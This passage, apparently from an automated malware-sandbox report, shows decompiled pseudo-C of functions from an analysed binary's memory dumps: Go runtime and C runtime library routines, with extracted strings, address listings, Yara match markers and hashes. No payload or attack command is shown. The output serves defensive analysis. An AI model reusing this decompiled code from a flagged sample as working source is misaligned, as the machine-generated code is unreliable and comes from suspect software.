					_t94 = __esp;
					_t93 = __esi;
					_t91 = __edi;
					_t86 = __edx;
					_t80 = __ecx;
					_t74 = __ebx;
					if(_t133 <=  *((intOrPtr*)(__r14 + 0x10))) {
						goto L34;
					}
					L1:
					_v8 = __rbp;
					_t129 =  &_v8;
					_a8 = __rax;
					_a16 = __ebx;
					 *((intOrPtr*)( *((intOrPtr*)(__r14 + 0x30)) + 0xd8)) =  *((intOrPtr*)( *((intOrPtr*)(__r14 + 0x30)) + 0xd8)) + 1;
					_v32 =  *((intOrPtr*)(__r14 + 0x30));
					_t59 = E01309600(0x147be78, __rdx,  &_v8, __r14);
					_t120 = _a8;
					if(_t120 != 0) {
						L4:
						_t124 =  *0x147be80; // 0xc000037000
						if(_t124 != 0) {
							_t116 =  *((intOrPtr*)(_t124 + 0x128));
							 *0x147be80 =  *((intOrPtr*)(_t124 + 0x128));
							 *0x147be88 =  *0x147be88 - 1;
							_t99 = _t124;
						}
						_v24 = _t120;
						if(_t99 != 0) {
							L11:
							_v16 = _t124;
							E01309820(0x147be78, _t129, _t145);
							_t120 = _v16;
							if( *(_t120 + 0xe4) != 0) {
								L33:
								_t103 = 0x1389e57;
								_t74 = 0x15;
								E01330BA0(0x1389e57, _t116, _t129);
								goto L34;
							} else {
								L12:
								if( *((long long*)(_t120 + 0xa8)) != 0) {
									L32:
									E01330BA0(0x1388642, _t116, _t129);
									goto L33;
								} else {
									L13:
									_t87 = _a16 & 0x000000ff;
									if(_t87 == 0) {
										L15:
										_t63 = 0;
										goto L23;
									} else {
										L14:
										_t128 = _v24;
										do {
											L27:
											_t92 =  *((intOrPtr*)(_t128 + 0x190));
											r8d =  *((intOrPtr*)(_t128 + 0x194));
											_t140 =  *((intOrPtr*)(_t128 + 0x998));
											r10d =  *((intOrPtr*)(_t128 + 0x194));
										} while (r10d != r8d);
										if(r8d != _t92 || _t140 != 0) {
											L31:
											E01330BA0(0x138b059, _t116, _t129);
											goto L32;
										} else {
											L30:
											_t63 = _t87;
											goto L23;
										}
									}
								}
							}
						} else {
							L7:
							E01334540(_t80, _t86, _t91, _t93, _t94, 0x147be78, _t127, _t129, _t145);
							_v40 = 0x147be78;
							E01309820(0x147be78, _t129, _t145);
							_t111 =  !=  ? 0x1401670 : 0x147be78;
							_t123 = _v40;
							_t71 = E01336960(0, _t74, _t80, _t86, _t91, _t93, _t94,  !=  ? 0x1401670 : 0x147be78, _v24, _t123, _t127, _t129, _t138, _t139, _t141, _t142, _t143, _t144, _t145, _t146);
							_t112 = _v32;
							_t20 = _t123 - 1; // -1
							 *((intOrPtr*)(_t112 + 0xd8)) = _t20;
							if( *((intOrPtr*)(_t112 + 0xd8)) == 1 &&  *((char*)(_t145 + 0xb1)) != 0) {
								 *((long long*)(_t145 + 0x10)) = 0xfffffade;
							}
							return _t71;
						}
					} else {
						L2:
						E0133EBE0(_t59, _t120, _t127,  &_v8, __r14);
						if(0x147be78 == 0) {
							L16:
							_t73 = E01309820(0x147be78,  &_v8, __r14);
							if((_a16 & 0x000000ff) == 0) {
								L18:
								_t114 = _v32;
								_t34 = _t120 - 1; // -1
								 *((intOrPtr*)(_t114 + 0xd8)) = _t34;
								if( *((intOrPtr*)(_t114 + 0xd8)) == 1 &&  *((char*)(_t145 + 0xb1)) != 0) {
									 *((long long*)(_t145 + 0x10)) = 0xfffffade;
								}
								return _t73;
							} else {
								L17:
								asm("lock xadd [edx], ecx");
								if(0xfffffffe < 0) {
									L22:
									_t63 = E01330BA0(0x138b726, _t116,  &_v8);
									L23:
									 *(_t120 + 0xe4) = _t63;
									_t125 = _v24;
									 *((long long*)(_t120 + 0xa8)) = _t125;
									_t64 = E01309900(_t120 + 0x118, _t129, _t145);
									_t121 = _v32;
									_t45 = _t125 - 1; // -1
									 *((intOrPtr*)(_t121 + 0xd8)) = _t45;
									if( *((intOrPtr*)(_t121 + 0xd8)) == 1 &&  *((char*)(_t145 + 0xb1)) != 0) {
										 *((long long*)(_t145 + 0x10)) = 0xfffffade;
									}
									return _t64;
								} else {
									goto L18;
								}
							}
						} else {
							L3:
							_t120 = 0x147be78;
							goto L4;
						}
					}
					L35:
					L34:
					_a8 = _t103;
					_a16 = _t74;
					E01356200(_t124, _t129);
				}
			}







































                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f40
                                                                                                                            0x01336f44
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01336f4a
                                                                                                                            0x01336f4e
                                                                                                                            0x01336f53
                                                                                                                            0x01336f58
                                                                                                                            0x01336f5d
                                                                                                                            0x01336f66
                                                                                                                            0x01336f71
                                                                                                                            0x01336f80
                                                                                                                            0x01336f85
                                                                                                                            0x01336f8d
                                                                                                                            0x01336fa1
                                                                                                                            0x01336fa1
                                                                                                                            0x01336fab
                                                                                                                            0x01336fad
                                                                                                                            0x01336fb4
                                                                                                                            0x01336fbb
                                                                                                                            0x01336fc1
                                                                                                                            0x01336fc1
                                                                                                                            0x01336fc4
                                                                                                                            0x01336fc9
                                                                                                                            0x01337045
                                                                                                                            0x01337045
                                                                                                                            0x01337053
                                                                                                                            0x01337058
                                                                                                                            0x01337064
                                                                                                                            0x013371b8
                                                                                                                            0x013371b8
                                                                                                                            0x013371bf
                                                                                                                            0x013371c4
                                                                                                                            0x00000000
                                                                                                                            0x0133706a
                                                                                                                            0x0133706a
                                                                                                                            0x01337072
                                                                                                                            0x013371a7
                                                                                                                            0x013371b3
                                                                                                                            0x00000000
                                                                                                                            0x01337078
                                                                                                                            0x01337078
                                                                                                                            0x01337078
                                                                                                                            0x01337082
                                                                                                                            0x0133708e
                                                                                                                            0x0133708e
                                                                                                                            0x00000000
                                                                                                                            0x01337084
                                                                                                                            0x01337084
                                                                                                                            0x01337084
                                                                                                                            0x01337161
                                                                                                                            0x01337161
                                                                                                                            0x01337161
                                                                                                                            0x01337167
                                                                                                                            0x0133716e
                                                                                                                            0x01337175
                                                                                                                            0x01337180
                                                                                                                            0x01337188
                                                                                                                            0x01337196
                                                                                                                            0x013371a2
                                                                                                                            0x00000000
                                                                                                                            0x0133718f
                                                                                                                            0x0133718f
                                                                                                                            0x0133718f
                                                                                                                            0x00000000
                                                                                                                            0x0133718f
                                                                                                                            0x01337188
                                                                                                                            0x01337082
                                                                                                                            0x01337072
                                                                                                                            0x01336fcb
                                                                                                                            0x01336fcb
                                                                                                                            0x01336fcb
                                                                                                                            0x01336fd0
                                                                                                                            0x01336fe0
                                                                                                                            0x01336ffc
                                                                                                                            0x01337005
                                                                                                                            0x0133700a
                                                                                                                            0x01337010
                                                                                                                            0x0133701b
                                                                                                                            0x0133701e
                                                                                                                            0x01337027
                                                                                                                            0x01337033
                                                                                                                            0x01337033
                                                                                                                            0x01337044
                                                                                                                            0x01337044
                                                                                                                            0x01336f8f
                                                                                                                            0x01336f8f
                                                                                                                            0x01336f8f
                                                                                                                            0x01336f97
                                                                                                                            0x01337094
                                                                                                                            0x013370a0
                                                                                                                            0x013370ac
                                                                                                                            0x013370c5
                                                                                                                            0x013370c5
                                                                                                                            0x013370d0
                                                                                                                            0x013370d3
                                                                                                                            0x013370dc
                                                                                                                            0x013370e8
                                                                                                                            0x013370e8
                                                                                                                            0x013370f9
                                                                                                                            0x013370ae
                                                                                                                            0x013370ae
                                                                                                                            0x013370ba
                                                                                                                            0x013370c2
                                                                                                                            0x013370fa
                                                                                                                            0x01337106
                                                                                                                            0x0133710b
                                                                                                                            0x0133710b
                                                                                                                            0x01337111
                                                                                                                            0x01337116
                                                                                                                            0x01337124
                                                                                                                            0x0133712a
                                                                                                                            0x01337135
                                                                                                                            0x01337138
                                                                                                                            0x01337143
                                                                                                                            0x0133714f
                                                                                                                            0x0133714f
                                                                                                                            0x01337160
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013370c2
                                                                                                                            0x01336f9d
                                                                                                                            0x01336f9d
                                                                                                                            0x01336f9d
                                                                                                                            0x00000000
                                                                                                                            0x01336f9d
                                                                                                                            0x01336f97
                                                                                                                            0x00000000
                                                                                                                            0x013371ca
                                                                                                                            0x013371ca
                                                                                                                            0x013371cf
                                                                                                                            0x013371d3
                                                                                                                            0x013371dd

                                                                                                                            Strings
                                                                                                                            • startm: m is spinningstate not recoverabletimer data corruption/lib/time/zoneinfo.zipAleutian Standard TimeAtlantic Standard TimeCaucasus Standard TimeConvertSidToStringSidWConvertStringSidToSidWCreateEnvironmentBlockCreateIoCompletionPortDateline Standard Tim, xrefs: 013371B8
                                                                                                                            • startm: m has pstopm holding p already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCur, xrefs: 013371A7
                                                                                                                            • startm: p has runnable gsstoplockedm: not runnableunexpected fault address unexpected key value typeBougainville Standard TimeCentral Asia Standard TimeCertFreeCertificateContextE. Australia Standard TimeEkaterinburg Standard TimeGetFileInformationByHandleLine, xrefs: 01337196
                                                                                                                            • startm: negative nmspinningstopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionswork.nwait was > work.nproc args stack map entries for Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia, xrefs: 013370FA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: startm: m has pstopm holding p already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCur$startm: m is spinningstate not recoverabletimer data corruption/lib/time/zoneinfo.zipAleutian Standard TimeAtlantic Standard TimeCaucasus Standard TimeConvertSidToStringSidWConvertStringSidToSidWCreateEnvironmentBlockCreateIoCompletionPortDateline Standard Tim$startm: negative nmspinningstopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionswork.nwait was > work.nproc args stack map entries for Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia$startm: p has runnable gsstoplockedm: not runnableunexpected fault address unexpected key value typeBougainville Standard TimeCentral Asia Standard TimeCertFreeCertificateContextE. Australia Standard TimeEkaterinburg Standard TimeGetFileInformationByHandleLine
                                                                                                                            • API String ID: 0-1045336544
                                                                                                                            • Opcode ID: cc8b55fdffd703e6b2bbe2fde4c01c12c5b3cc751662ca9b0552990e82e7418e
                                                                                                                            • Instruction ID: eaefb812e366580dfbdacdd04f51705cc206feb60c73295b48e448355cb6cfc2
                                                                                                                            • Opcode Fuzzy Hash: cc8b55fdffd703e6b2bbe2fde4c01c12c5b3cc751662ca9b0552990e82e7418e
                                                                                                                            • Instruction Fuzzy Hash: 0E6107B6209B80CADB15CB18E4907AEBB64F3C57ACF485626EB9D077A5CF38C145CB04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A77574 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 53%
                                                                                                                            			E0000025B25BF8A77574(void* __edx, signed int __edi, long long __rbx, void* __rcx, void* __rsi, long long __rbp, char _a8) {
				void* _v32;
				char _v64;
				intOrPtr _v72;
				char _v80;
				long long _v96;
				long long _v104;
				intOrPtr _v112;
				intOrPtr _t32;
				signed int _t33;
				void* _t34;
				intOrPtr _t36;
				intOrPtr _t38;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr _t60;
				void* _t61;
				void* _t62;
				void* _t77;
				intOrPtr _t79;
				void* _t106;
				void* _t107;
				void* _t111;
				void* _t115;
				void* _t123;
				int _t125;

				_t77 = _t115;
				 *((long long*)(_t77 + 8)) = __rbx;
				 *((long long*)(_t77 + 0x18)) = __rbp;
				 *((long long*)(_t77 + 0x20)) = __rsi;
				_t107 = __edx;
				_t111 = __rcx;
				 *((intOrPtr*)(_t77 + 0x10)) = 0x10;
				_t62 = __edi - 0x10;
				if (_t62 <= 0) goto 0xf8a77764;
				_t5 = _t107 - 0x10; // -16
				_t60 = _t5;
				malloc(_t125);
				r14d = 1;
				_t81 = _t77;
				if (_t62 >= 0) goto 0xf8a775c9;
				r15d = 0;
				if (((__edi & 0x8000000f) - r14d | 0xfffffff0) + r14d == 0) goto 0xf8a775d8;
				goto 0xf8a7775f;
				_t7 = _t107 - 0x10; // -16
				_t32 = _t7;
				_v96 =  &_a8;
				_v104 =  &_v80;
				r8d = 0x10;
				_v112 = _t32;
				0xf8a60d8c(_t123, _t106);
				if (_t32 != 0) goto 0xf8a77780;
				if ( *((intOrPtr*)(__edx + __rcx - 0x10)) != _v80) goto 0xf8a7775c;
				_t79 =  *((intOrPtr*)(__edx + __rcx - 8));
				if (_t79 != _v72) goto 0xf8a7775c;
				_t33 =  *0xf8a9e82c & 0x0000ffff;
				if (_t33 != 0) goto 0xf8a776a7;
				_t50 =  *0xf8a9e824; // 0x1fb1c
				r9d = 0x10;
				_v104 = 0xf8a9f990;
				_v112 = r15d;
				0xf8a607a4();
				if (_t33 != 0) goto 0xf8a77789;
				r8d = _t60;
				0xf8a60988();
				if (_t33 != 0) goto 0xf8a77792;
				0xf8a60ac0();
				if (_t33 == 0) goto 0xf8a776bf;
				goto 0xf8a7779b;
				if (_t33 != r14w) goto 0xf8a777b4;
				_t34 = E0000025B25BF8A797B0(_t50, __edi, _t59, _t61, _t77, __rcx, _t60);
				r8d = _t60;
				E0000025B25BF8A73230(_t34,  &_v64, _t77);
				_t36 = E0000025B25BF8A73240( &_v64);
				_t56 =  *0xf8a9e820; // 0x397b8
				_t22 = _t79 + 0xe10; // 0xe10
				r14d = _t36;
				if (_t22 - _t56 > 0) goto 0xf8a77704;
				free(__rsi);
				E0000025B25BF8A6CEEC(_t81);
				goto 0xf8a77764;
				_t38 = E0000025B25BF8A73240( &_v64);
				_t58 = _t38;
				if (_t38 == 0) goto 0xf8a777ac;
				if (_t58 - _t60 > 0) goto 0xf8a777ac;
				E0000025B25BF8A73278(_t58,  &_v64);
				if (_t79 == 0) goto 0xf8a777a4;
				r8d = _t58;
				E0000025B25BF8A797B0(0x25bf8a9eb80, _t58, _t59, _t61, _t111, _t79, _t60);
				 *0xf8a9e820 = r14d;
				E0000025B25BF8A731C4(_t79, _t81,  &_v64, _t79);
				free(??);
				goto 0xf8a77766;
				free(??);
				return 0;
			}






























                                                                                                                            0x25bf8a77574
                                                                                                                            0x25bf8a77577
                                                                                                                            0x25bf8a7757b
                                                                                                                            0x25bf8a7757f
                                                                                                                            0x25bf8a7758c
                                                                                                                            0x25bf8a7758f
                                                                                                                            0x25bf8a77592
                                                                                                                            0x25bf8a77599
                                                                                                                            0x25bf8a7759c
                                                                                                                            0x25bf8a775a2
                                                                                                                            0x25bf8a775a2
                                                                                                                            0x25bf8a775a8
                                                                                                                            0x25bf8a775af
                                                                                                                            0x25bf8a775b5
                                                                                                                            0x25bf8a775be
                                                                                                                            0x25bf8a775c9
                                                                                                                            0x25bf8a775ce
                                                                                                                            0x25bf8a775d3
                                                                                                                            0x25bf8a775e6
                                                                                                                            0x25bf8a775e6
                                                                                                                            0x25bf8a775e9
                                                                                                                            0x25bf8a775f6
                                                                                                                            0x25bf8a77602
                                                                                                                            0x25bf8a77608
                                                                                                                            0x25bf8a7760c
                                                                                                                            0x25bf8a77613
                                                                                                                            0x25bf8a77623
                                                                                                                            0x25bf8a77629
                                                                                                                            0x25bf8a77633
                                                                                                                            0x25bf8a77639
                                                                                                                            0x25bf8a77643
                                                                                                                            0x25bf8a77645
                                                                                                                            0x25bf8a77660
                                                                                                                            0x25bf8a77666
                                                                                                                            0x25bf8a7766b
                                                                                                                            0x25bf8a77670
                                                                                                                            0x25bf8a77677
                                                                                                                            0x25bf8a77680
                                                                                                                            0x25bf8a77689
                                                                                                                            0x25bf8a77690
                                                                                                                            0x25bf8a77699
                                                                                                                            0x25bf8a776a0
                                                                                                                            0x25bf8a776a2
                                                                                                                            0x25bf8a776ab
                                                                                                                            0x25bf8a776ba
                                                                                                                            0x25bf8a776c4
                                                                                                                            0x25bf8a776ca
                                                                                                                            0x25bf8a776d4
                                                                                                                            0x25bf8a776d9
                                                                                                                            0x25bf8a776df
                                                                                                                            0x25bf8a776e5
                                                                                                                            0x25bf8a776ea
                                                                                                                            0x25bf8a776ef
                                                                                                                            0x25bf8a776fd
                                                                                                                            0x25bf8a77702
                                                                                                                            0x25bf8a77709
                                                                                                                            0x25bf8a7770e
                                                                                                                            0x25bf8a77712
                                                                                                                            0x25bf8a7771a
                                                                                                                            0x25bf8a77727
                                                                                                                            0x25bf8a7772f
                                                                                                                            0x25bf8a77731
                                                                                                                            0x25bf8a7773a
                                                                                                                            0x25bf8a77744
                                                                                                                            0x25bf8a7774b
                                                                                                                            0x25bf8a77753
                                                                                                                            0x25bf8a7775a
                                                                                                                            0x25bf8a7775f
                                                                                                                            0x25bf8a7777f

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno$_callnewhmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2761444284-0
                                                                                                                            • Opcode ID: daa954f963036e8b3c4eac29bf1e0a8b431d3dd5db7c0072ee357d8f39c2b8a7
                                                                                                                            • Instruction ID: 9ac61cd18c12dad04580cb7706af32332ad2bd217e776399c0365bc205840c62
                                                                                                                            • Opcode Fuzzy Hash: daa954f963036e8b3c4eac29bf1e0a8b431d3dd5db7c0072ee357d8f39c2b8a7
                                                                                                                            • Instruction Fuzzy Hash: 8B510027300E0191EE1AAF21DC593AD6391F790BA2FB54426FE1A57FCADF78C4119368
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A6D5A0 Relevance: 5.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 63%
                                                                                                                            			E0000025B25BF8A6D5A0(intOrPtr __ebx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __r14) {
				void* __rbp;
				signed int _t56;
				intOrPtr _t62;
				void* _t75;
				signed int _t82;
				void* _t86;
				void* _t88;
				void* _t89;
				void* _t98;
				signed long long _t101;
				void* _t103;
				void* _t107;
				signed long long _t120;
				long long _t133;
				void* _t136;
				void* _t137;
				void* _t138;
				void* _t140;
				void* _t141;
				void* _t143;
				void* _t152;
				void* _t156;
				signed long long _t159;

				_t133 = __rdi;
				_t128 = __rdx;
				_t72 = __ebx;
				_t98 = _t140;
				 *((long long*)(_t98 + 8)) = __rbx;
				 *((long long*)(_t98 + 0x10)) = __rdi;
				 *((long long*)(_t98 + 0x18)) = __r14;
				_t138 = _t98 - 0x418;
				_t141 = _t140 - 0x510;
				 *(_t138 - 0x78) =  *(_t138 - 0x78) & 0x00000000;
				_t107 = __rcx;
				r8d = 0x3ff;
				 *((long long*)(_t138 - 0x80)) = 0xf8a8bad0;
				 *((char*)(_t138 + 0x10)) = 0;
				E0000025B25BF8A793C0(_t75, 0, _t86, _t89, _t138 + 0x11, __rdx, _t143);
				 *((char*)(_t138 - 0x70)) = 0;
				_t12 = _t128 + 0x7f; // 0x7f
				r8d = _t12;
				E0000025B25BF8A793C0(_t75, 0, _t86, _t89, _t138 - 0x6f, __rdx, _t143);
				 *(_t141 + 0x40) =  *(_t141 + 0x40) & 0x00000000;
				_t15 = _t128 + 0x38; // 0x38
				r8d = _t15;
				E0000025B25BF8A793C0(_t75, 0, _t86, _t89, _t141 + 0x48, __rdx, _t143);
				_t82 =  *0xf8a9d888; // 0xd878
				if (_t82 == 0) goto 0xf8a6d7ba;
				E0000025B25BF8A75068(_t88, 0xf8a8bad0, _t141 + 0x40, __rdx, _t136, _t152);
				E0000025B25BF8A794CC(__ebx, _t75, 0xf8a8bad0,  *((intOrPtr*)(_t141 + 0x50)), __rdx, 0xf8a8bac4, _t107, _t137);
				r9d =  *0xf8aa6b40;
				E0000025B25BF8A794CC(__ebx, _t75, 0xf8a8bad0, _t138 - 0x70, _t128, 0xf8a8bad4, _t107);
				_t159 = __r14 | 0xffffffff;
				_t100 = _t138 - 0x70;
				_t109 = _t159 + 1;
				if ( *((char*)(_t138 - 0x70 + _t159 + 1)) != 0) goto 0xf8a6d669;
				E0000025B25BF8A77A30(0xd,  *((char*)(_t138 - 0x70 + _t159 + 1)), _t100, _t128);
				_t56 =  *0xf8a9d888; // 0xd878
				r9d = __ebx;
				 *(_t141 + 0x28) = _t56;
				_t101 =  *0xf8a9d880; // 0x390780000d877
				 *(_t141 + 0x20) = _t101;
				E0000025B25BF8A747D0( *((char*)(_t138 - 0x70 + _t159 + 1)), _t109, _t100, _t141 + 0x40, __rdi, _t136, _t138 - 0x70, _t107, _t156);
				_t103 = _t159 + 1;
				if ( *((char*)( *((intOrPtr*)(_t141 + 0x48)) + _t103)) != 0) goto 0xf8a6d6ae;
				if (_t103 != 0) goto 0xf8a6d6d6;
				_t120 = _t138 + 0x10;
				E0000025B25BF8A794CC(_t72, 0xd, _t103, _t120, _t133, 0xf8a8bac4,  *((intOrPtr*)(_t141 + 0x50)));
				goto 0xf8a6d6eb;
				 *(_t141 + 0x20) = _t120;
				E0000025B25BF8A794CC(_t72, 0xd, _t103, _t138 + 0x10, _t133, 0xf8a8bad8,  *((intOrPtr*)(_t141 + 0x50)));
				E0000025B25BF8A78AE4();
				E0000025B25BF8A77A30(0x1b, _t103, _t103, _t133);
				r9d = 0;
				 *((long long*)(_t141 + 0x38)) = 0xf8a9d890;
				_t62 =  *0xf8a9d88c; // 0xd8da
				 *((intOrPtr*)(_t141 + 0x30)) = _t62;
				_t105 = _t138 - 0x80;
				 *(_t141 + 0x28) = _t138 - 0x80;
				 *(_t141 + 0x20) =  *(_t141 + 0x20) & 0x00000000;
				 *0xf8a8b958();
				E0000025B25BF8A6D2BC(_t138 - 0x80, _t105);
				if ( *((char*)( *(_t141 + 0x40) + _t159 + 1)) != 0) goto 0xf8a6d74b;
				 *(_t141 + 0x20) =  *(_t141 + 0x60);
				 *0xf8a8b968();
				if (E0000025B25BF8A6D8A0() != 0) goto 0xf8a6d798;
				 *0xf8a8b928();
				 *"rb"();
				if (1 - 4 < 0) goto 0xf8a6d6f2;
				goto 0xf8a6d79e;
				 *0xf8a8b928();
				E0000025B25BF8A7505C(_t88, _t105, _t141 + 0x40,  *(_t141 + 0x40), _t136,  *((intOrPtr*)(_t141 + 0x58)));
				 *0xf8a9d888 =  *0xf8a9d888 & 0x00000000;
				return E0000025B25BF8A78B14();
			}


























                                                                                                                            0x25bf8a6d5a0
                                                                                                                            0x25bf8a6d5a0
                                                                                                                            0x25bf8a6d5a0
                                                                                                                            0x25bf8a6d5a0
                                                                                                                            0x25bf8a6d5a3
                                                                                                                            0x25bf8a6d5a7
                                                                                                                            0x25bf8a6d5ab
                                                                                                                            0x25bf8a6d5b0
                                                                                                                            0x25bf8a6d5b7
                                                                                                                            0x25bf8a6d5be
                                                                                                                            0x25bf8a6d5c3
                                                                                                                            0x25bf8a6d5d3
                                                                                                                            0x25bf8a6d5d9
                                                                                                                            0x25bf8a6d5dd
                                                                                                                            0x25bf8a6d5e1
                                                                                                                            0x25bf8a6d5ec
                                                                                                                            0x25bf8a6d5f0
                                                                                                                            0x25bf8a6d5f0
                                                                                                                            0x25bf8a6d5f4
                                                                                                                            0x25bf8a6d5f9
                                                                                                                            0x25bf8a6d601
                                                                                                                            0x25bf8a6d601
                                                                                                                            0x25bf8a6d60a
                                                                                                                            0x25bf8a6d60f
                                                                                                                            0x25bf8a6d617
                                                                                                                            0x25bf8a6d622
                                                                                                                            0x25bf8a6d63d
                                                                                                                            0x25bf8a6d642
                                                                                                                            0x25bf8a6d659
                                                                                                                            0x25bf8a6d65e
                                                                                                                            0x25bf8a6d662
                                                                                                                            0x25bf8a6d669
                                                                                                                            0x25bf8a6d670
                                                                                                                            0x25bf8a6d677
                                                                                                                            0x25bf8a6d688
                                                                                                                            0x25bf8a6d68e
                                                                                                                            0x25bf8a6d691
                                                                                                                            0x25bf8a6d695
                                                                                                                            0x25bf8a6d69c
                                                                                                                            0x25bf8a6d6a1
                                                                                                                            0x25bf8a6d6ae
                                                                                                                            0x25bf8a6d6b5
                                                                                                                            0x25bf8a6d6c2
                                                                                                                            0x25bf8a6d6cb
                                                                                                                            0x25bf8a6d6cf
                                                                                                                            0x25bf8a6d6d4
                                                                                                                            0x25bf8a6d6d6
                                                                                                                            0x25bf8a6d6e6
                                                                                                                            0x25bf8a6d6eb
                                                                                                                            0x25bf8a6d6f7
                                                                                                                            0x25bf8a6d711
                                                                                                                            0x25bf8a6d714
                                                                                                                            0x25bf8a6d719
                                                                                                                            0x25bf8a6d71f
                                                                                                                            0x25bf8a6d723
                                                                                                                            0x25bf8a6d727
                                                                                                                            0x25bf8a6d72c
                                                                                                                            0x25bf8a6d732
                                                                                                                            0x25bf8a6d73e
                                                                                                                            0x25bf8a6d753
                                                                                                                            0x25bf8a6d761
                                                                                                                            0x25bf8a6d765
                                                                                                                            0x25bf8a6d778
                                                                                                                            0x25bf8a6d77a
                                                                                                                            0x25bf8a6d785
                                                                                                                            0x25bf8a6d790
                                                                                                                            0x25bf8a6d796
                                                                                                                            0x25bf8a6d798
                                                                                                                            0x25bf8a6d7a9
                                                                                                                            0x25bf8a6d7ae
                                                                                                                            0x25bf8a6d7d2

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintf$_errno_flsbuf_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3206768600-0
                                                                                                                            • Opcode ID: 3a55a556e6a76951abe6aec8a4989afcb54de1f4fbcc6836e17e30bccf138cf2
                                                                                                                            • Instruction ID: 5d9a9ce2b99c41d8f11936564ece3aae4bddae253629be6b97d80c42a2a70617
                                                                                                                            • Opcode Fuzzy Hash: 3a55a556e6a76951abe6aec8a4989afcb54de1f4fbcc6836e17e30bccf138cf2
                                                                                                                            • Instruction Fuzzy Hash: A851AB37204E458AEF129B61EC4839D73A0F3847A6F241122FA6D03F9ADF38C446C768
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01311F80 Relevance: 5.1, Strings: 4, Instructions: 121COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 54%
